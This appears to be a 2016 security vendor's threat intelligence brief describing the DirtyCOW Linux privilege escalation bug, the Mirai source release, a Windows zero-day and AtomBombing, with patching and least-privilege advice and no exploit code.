Threat Intelligence Brief – November 2016


Privilege Escalation Exploits and DirtyCOW

Privilege escalation (privesc) techniques and exploits are used by threat actors to grant themselves root level permissions in your environment.

How Privsec Techniques Work

Those attempting privesc typically gain initial network access through vulnerable web services. Once in, they’ll use a web shell to maintain their presence on the targeted machine and attempt to elevate their permissions to the root level.

Privsec TIB image

What is DirtyCOW?

Until recently, gaining initial access for a privsec attack was challenging for even the most talented threat actors. However, that’s no longer the case with the release of the Linux zero-day privilege escalation exploit, DirtyCOW.

DirtyCOW is a bug that has been present in the majority of Linux kernels since 2007. There were attempts to fix the issue when it was first discovered 11 years ago, however these were abandoned when the issue was difficult to recreate consistently.

Unfortunately, the bug is now easily recreated, enabling threat actors to locally exploit a race condition in the copy-on-write (COW) kernel memory subsystem. Worst of all, it’s practically untraceable as it leaves no trace within the logs indicating abnormal activity.

Associated IPs

These IPs have been involved in scanning or attacks relating to web shells possibly used in privsec attacks and should be blocked from your environment. The Armor network has been updated to defend against these threats.

TIB IP Address list


Due to the direct correlation between the number of FIM events and the DirtyCow vulnerability fix, a large amount of FIM events (potentially 50K) will be triggered by the kernel file attributes being modified.
Please note this is not an indication of security concern.

Mitigating These Threats

Privilege Escalation

The majority of privesc exploits prey on unpatched operating systems and software. Ensuring your system has the latest patch is critical to alleviating these vulnerabilities. After initial disclosure of a new exploit, there’s typically a surge of activity by threat actors seeking to capitalize on it. Fortunately, even if an exploit is released without corresponding patches there are steps you can take to minimize the chance that initial access to your environment takes place:

  • Patch vulnerable operating systems, software and firmware – Apply patch or firmware updates as soon as they’re available. This applies to your entire environment, not just web facing servers. You can reduce the likelihood an attacker compromising a vulnerable web service or an application on a host workstation by patching.
  • Scrutinize outbound traffic – Look for outbound traffic reaching out to known bad IPs. After initial access, threat actors will perform a wget command to pull additional files for exploitation. This may also be an attempt to connect with a command and control server for post-exploitation instructions.
  • Adhere to least privilege – All users and applications within your environment should operate on the least amount of privilege required to function. Running applications with elevated permissions increases the chance that a programming error might allow an attacker to use elevated application permissions to conduct unintended tasks or facilitate privesc attacks.

Applying updated patches is the only way to remove this security vulnerability. CentOS, Red Hat, Debian and Ubuntu have released patches with other distros to roll out theirs soon. Since some older versions of Linux dsitros may not be patched, we highly advise that you upgrade to a newer version of the Linux OS.

It’s important to note this bug isn’t an exploit in itself and doesn’t grant threat actors remote access. However, once they have remote access, it allows them to use a wide array of remote exploits and web shells to gain root permissions in targeted machines that normally restrict user level access. This is why patching is so critical to network security. If they can’t gain an initial foothold in your environment, then they can’t privesc.



Someone has released the source code for the Mirai botnet responsible for the DD0S against Krebs. This development has the potential to open the floodgates for future attacks. Krebs on Security suffered the wrath of the first Mirai DDoS attack, but it was the attack against Dyn DNS that had the internet reeling. While the threat is daunting, the solution isn’t: Access to these devices isn’t persistent and doesn’t survive a reboot. However simple, with the world scrambling to make sense of this new attack vector, it’s unclear whom will control the millions of devices out there with vulnerable configurations and weak default passwords. Our hopes are for users of IoT devices will heed the warning signs and change the credentials from default and apply firmware updates to these devices.

Read More


Not to be outdone by vulnerable Linux-based devices, Windows is back in the news for a zero-day privesc exploit. Google notified Microsoft that they discovered a vulnerability on October 21. Google has a policy of reporting actively exploited vulnerabilities. They give the affected company a week to release an update before going public with the news, which Google did as Microsoft has yet to release a patch for this vulnerability. Microsoft did, however respond that the exploit is currently being used by the same Russian state actors behind the DNC hack. By combining this Microsoft vulnerability with an Adobe Flash zero-day exploit, threat actors can escape the application sandbox and elevate privilege within the targeted network. A security patch for Adobe Flash was released on October 26, and a patch for all versions of Windows is in the works.

Get the Full Story


AtomBombing, a newly released code injection technique, was named for its ability to compromise every version of the Windows operating system regardless of malware protection. This technique attacks system level Atom tables, which are used by Windows applications to store information on different types of data. The malicious code modifies these tables and causes legitimate applications to execute malicious actions, bypassing process level restrictions. Unfortunately, this is a design flaw in the operating system and not easily patched out. Microsoft suggests that users maintain a heightened security posture such as exercising caution when clicking on links, opening unknown files or accepting file transfers. The system must already be compromised for this code injection technique to work.

Learn More